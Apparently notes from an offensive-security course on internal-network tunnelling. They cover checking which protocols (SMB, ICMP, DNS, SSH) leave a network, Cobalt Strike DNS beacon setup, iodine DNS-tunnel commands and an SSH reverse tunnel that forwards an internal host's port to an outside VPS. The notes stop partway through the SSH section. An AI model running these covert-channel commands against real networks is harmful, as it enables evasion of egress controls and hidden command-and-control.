内网渗透-隧道判断-SSH-DNS-icmp-smb-上线linux-mac
1.通道判断
#SMB 隧道&通讯&上线
判断:445 通讯
上线:借助通讯后绑定上线
通讯:直接 SMB 协议通讯即可
#ICMP 隧道&通讯&上线
判断:ping 命令
上线:见前面课程
通讯:其他项目(icmpsh icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
#DNS 隧道&通讯&上线
判断:nslookup dig
1、上线环境:内网主机只出网 DNS 协议数据,解决上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2.dns隧道上线
进行域名配置
配置cs
ttx.com 是注册域名
进入会话执行
mode dns-txt
内网主机只出网 DNS 协议数据,解决通讯
https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com
服务器:设置密码 hzy0 并创建虚拟 IP 及绑定域名指向
iodined -f -c -P hzy0 192.168.0.1 ns1.ttx.com -DD 设置密码 hzy0 并创建虚拟 IP 及绑定域名指向
客户端:连接密码 hzy0 并绑定域名指向
iodine -f -M 200 -P hzy0 ns1.ttx.com
尝试通讯尝试连接: ssh root@192.168.0.2
3.ssh隧道做内网探针
出站规则松懈:
在linux执行
将windows8080端口流量通过ssh隧道提交给vps
ssh -CfNg -R 1234:windwosip:8080 root@vps_ip
入站规则松懈:
